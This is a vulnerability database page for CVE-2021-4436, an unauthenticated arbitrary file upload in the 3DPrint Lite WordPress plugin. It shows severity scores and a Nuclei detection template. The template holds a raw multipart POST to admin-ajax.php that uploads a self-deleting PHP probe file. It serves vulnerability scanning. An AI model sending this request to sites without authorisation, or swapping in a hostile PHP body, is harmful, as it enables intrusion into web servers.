Lucene search
ProjectDiscoveryNUCLEI:CVE-2021-4436HistoryJun 24, 2024 - 1:55 p.m.
3DPrint Lite < 1.9.1.5 - Arbitrary File Upload
2024-06-2413:55:44
ProjectDiscovery
github.com
2
cve
file upload
wordpress
wp-plugin
unauthenticated users
apache
security vulnerability
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.1 High
AI Score
Confidence
Low
0.188 Low
EPSS
Percentile
96.3%
The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
id: CVE-2021-4436
info:
name: 3DPrint Lite < 1.9.1.5 - Arbitrary File Upload
author: securityforeveryone
severity: critical
description: |
The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
remediation: Fixed in 1.9.1.5
reference:
- https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282/
- https://nvd.nist.gov/vuln/detail/CVE-2021-4436
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-4436
cwe-id: CWE-434
epss-score: 0.00412
epss-percentile: 0.73863
cpe: cpe:2.3:a:wp3dprinting:3dprint_lite:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: wp3dprinting
product: 3dprint_lite
framework: wordpress
publicwww-query: "/wp-content/plugins/3dprint-lite/"
tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive
variables:
string: "{{randstr}}"
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353
-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="action"
p3dlite_handle_upload
-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
Content-Type: text/php
<?php echo "{{string}}";unlink(__FILE__);?>
-----------------------------54331109111293931601238262353--
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"jsonrpc":"2.0"'
- '"filename":'
- '{{filename}}.php'
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220505cc213149b2b7ea3611ef5cd0bf0c1d786d34503427cfdbd6ccc0844710e430221008083729a34767882c976fc061ae7a9a6db2061f3de0036ea1c4da8ec263724cf:922c64590222798bb761d5b6d8e72950Related
cve
cve
CVE-2021-4436
2024-02-05 09:15:43
thn
thn
cvelist
cvelist
CVE-2021-4436 3DPrint Lite < 1.9.1.5 - Unauthenticated Arbitrary File Upload
2024-02-05 09:02:44
nvd
nvd
CVE-2021-4436
2024-02-05 09:15:43
prion
prion
Design/Logic Flaw
2024-02-05 09:15:00
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.1 High
AI Score
Confidence
Low
0.188 Low
EPSS
Percentile
96.3%
Related for NUCLEI:CVE-2021-4436